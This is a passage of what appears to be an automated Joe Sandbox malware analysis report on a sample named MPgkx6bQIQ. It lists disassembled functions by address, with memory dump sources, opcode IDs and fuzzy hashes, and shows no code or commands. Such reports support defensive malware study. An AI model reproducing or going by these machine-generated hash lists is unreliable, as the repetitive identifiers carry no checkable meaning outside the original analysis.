                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C510573F499814BD72C893C5C223EAAA834BD6234B2DD77BE4B2CB3E4D5698C464345
                                                                                                                                                                                                                                                                                          Function 024A8009 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: m
                                                                                                                                                                                                                                                                                          • API String ID: 0-3775001192
                                                                                                                                                                                                                                                                                          • Opcode ID: 41b4e45d489525032a7ff55d2696e510600e92b2c3d7551ddfae36ad8bd27945
                                                                                                                                                                                                                                                                                          • Instruction ID: f53be0f73d4a47ab0116ceaf74d970fa49048ab4d533bbbccf5476e0c055a057
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b4e45d489525032a7ff55d2696e510600e92b2c3d7551ddfae36ad8bd27945
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 355126B19083908FD724DF2984A166FBBE2EFE1304F05892EE5D587351D739D909CB92
                                                                                                                                                                                                                                                                                          Function 024BA9DE Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: w
                                                                                                                                                                                                                                                                                          • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                                          • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                                          • Instruction ID: 93f77f600156081d49453e92a0e26cac2a14de1a0dcf10148a5ca4829222eb59
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B4129B6E116218FD704DFA4CC845ABBB72FF84315B0AC1A8C8847B315D77869078BE0
                                                                                                                                                                                                                                                                                          Function 0043A777 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: w
                                                                                                                                                                                                                                                                                          • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                                          • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                                          • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                                                                                                                                                                                          Function 024BCFC7 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                                          • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                                          • Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                                                          • Instruction ID: 1f53fd0d68990542ebf43f0cfbd40389b85a54fda75baf375d1a4998570fa572
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03312630B04300EBE7118F249C80BBFBBA4DF8671CF28496DE68593390D721E852CE66
                                                                                                                                                                                                                                                                                          Function 024BD0F7 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                                          • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                                          • Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                                                          • Instruction ID: eb1d7d0378c3962e13bb0c83517e7c9052d7ecb5741a8418096a831f3850064f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77310934B04341EBE7168B249C81BBBBBE5EF8A718F24457DE68457390D731E850CA76
                                                                                                                                                                                                                                                                                          Function 0043CE90 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                                          • Opcode ID: 53ff61613a6750327358e77a3d2a2db8208b12b742968293ea1bf310bf76e569
                                                                                                                                                                                                                                                                                          • Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53ff61613a6750327358e77a3d2a2db8208b12b742968293ea1bf310bf76e569
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A
                                                                                                                                                                                                                                                                                          Function 024A6739 Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: dB
                                                                                                                                                                                                                                                                                          • API String ID: 0-2104629891
                                                                                                                                                                                                                                                                                          • Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                                                          • Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C
                                                                                                                                                                                                                                                                                          Function 004143C2 Relevance: .8, Instructions: 805COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 74e5d679941b5201df3add8242bcee197539960a97a0704daeb999c7d2de46bb
                                                                                                                                                                                                                                                                                          • Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74e5d679941b5201df3add8242bcee197539960a97a0704daeb999c7d2de46bb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A
                                                                                                                                                                                                                                                                                          Function 00416BA5 Relevance: .7, Instructions: 688COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                                                          • Instruction ID: 9c79f7e63c480dd40f7a7ccc60d41b21814d9940eb0dc65dd07d8a453e372cf2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16120E35204B018FD325CF29C8907A3BBE2EF9A314F19866DD4DA8B795D738E846CB54
                                                                                                                                                                                                                                                                                          Function 02483207 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                                          • Instruction ID: 7ef22f74320786e985984db4684891e33db06cf37ac3f1a4b90d4ae89cdd28e9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E52F3715183458FC715DF18C0906AEBFE1BF88B18F1986AEF8995B341D774E889CB81
                                                                                                                                                                                                                                                                                          Function 00402FA0 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                                          • Instruction ID: b7901f3288d9e4572b9bc57ce4c79cacd886df45a950704f10474c7163005246
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE52F4715083458FCB14CF18C0806AABFE1BF89315F18867EF8996B391D778EA49CB85
                                                                                                                                                                                                                                                                                          Function 02486947 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
                                                                                                                                                                                                                                                                                          • Instruction ID: 1f2acf7be47b03e23fd54eba74ebe2fbb865082f0c63473d8b1e041d753d5fe4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5852E570A18B848FE771EB24C4943ABFBE1EB41314F15492FD5EA06BC2D379A485CB16
                                                                                                                                                                                                                                                                                          Function 004066E0 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 7b0d0db576f8f4a099c36225a03624d7682871d61e803cbbd0c0fa625a463efe
                                                                                                                                                                                                                                                                                          • Instruction ID: f9402e00db0146810cf529bce4eeb96ef771652ee20e7226bad8efb3fef3d353
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b0d0db576f8f4a099c36225a03624d7682871d61e803cbbd0c0fa625a463efe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA52C7B0A08B848FE735CB24C4843A7BBE1AB51314F15893FD5E716BC2C27DA995C71A
                                                                                                                                                                                                                                                                                          Function 0249F347 Relevance: .6, Instructions: 640COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                                                          • Instruction ID: 379f34030245abb869f7841496477135af09ff579d289cec90ed8b53ab3637d5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87625CB0608B818ED325CF3C8855797BFE5AB5A314F048A5DE0EE873D2C7B96405CB66
                                                                                                                                                                                                                                                                                          Function 0041F0E0 Relevance: .6, Instructions: 640COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                                                          • Instruction ID: d272bb6b5d6e2c7a5f0cafe8b1d1f27913d4ef5c9ad92f98558892845c7f91e7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5625CB0608B818ED325CF3C8855797BFE5AB5A314F048A5DE0EE873D2C7B96405CB66
                                                                                                                                                                                                                                                                                          Function 02483C27 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 678ad88440436fc2347c77ec1617077ed1d00620730d0d2d7e6321ebe71b5d32
                                                                                                                                                                                                                                                                                          • Instruction ID: 939b1bda7137b1d84d7c2f62d406c41550934713dde7fc45adb5931d91826267
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 678ad88440436fc2347c77ec1617077ed1d00620730d0d2d7e6321ebe71b5d32
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85322471524B118FC378EF29C69052ABBF1BF45A10B504A6ED6A78BF90D736F885CB10
                                                                                                                                                                                                                                                                                          Function 02487717 Relevance: .6, Instructions: 595COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                                                                                                                                                                                                                                                          • Instruction ID: 8144078db26368c744c360e93e32fc00ce9f8f0de831ebeb02b125b62bc0a424
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B802C7366187518BD724EF18D89067FF3E2EFC4309F29892EC98697385E734A545CB42
                                                                                                                                                                                                                                                                                          Function 004074B0 Relevance: .6, Instructions: 595COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                                                                                                                                                                                                                                                          • Instruction ID: 1131e2afb1b9b7a06d06e0851762e967182e12a53f43e8bd2da4f6050e1e8ff1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C802C732A0C7118BC724DE18D8816ABB3E2EBD4345F19893ED586A73C5D738B815CB4B
                                                                                                                                                                                                                                                                                          Function 004180A9 Relevance: .4, Instructions: 449COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4dd2ae9de0c92353fdee7b76ec7abb733c8c81e1fe53acaa0633d379e72706e7
                                                                                                                                                                                                                                                                                          • Instruction ID: 6564eefc0a79269b3db00a3a3e2fdb8cf1d61b2510fe7412d98733e2447c0821
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dd2ae9de0c92353fdee7b76ec7abb733c8c81e1fe53acaa0633d379e72706e7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CC128342047418FD7258F28C890AA7BBE1FF9B310F58896ED4D6477A2CB75E846CB58
                                                                                                                                                                                                                                                                                          Function 0043C280 Relevance: .4, Instructions: 422COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
                                                                                                                                                                                                                                                                                          • Instruction ID: 2610ce8d2ada8b42ce1f8a49459609e4fff09a6b757421d9f45879ca41997f09
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8D10E36A187508FC704CF28D8D162AB7E2BBCE314F09897DE98687396D738D905CB46
                                                                                                                                                                                                                                                                                          Function 0043C1F0 Relevance: .4, Instructions: 406COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
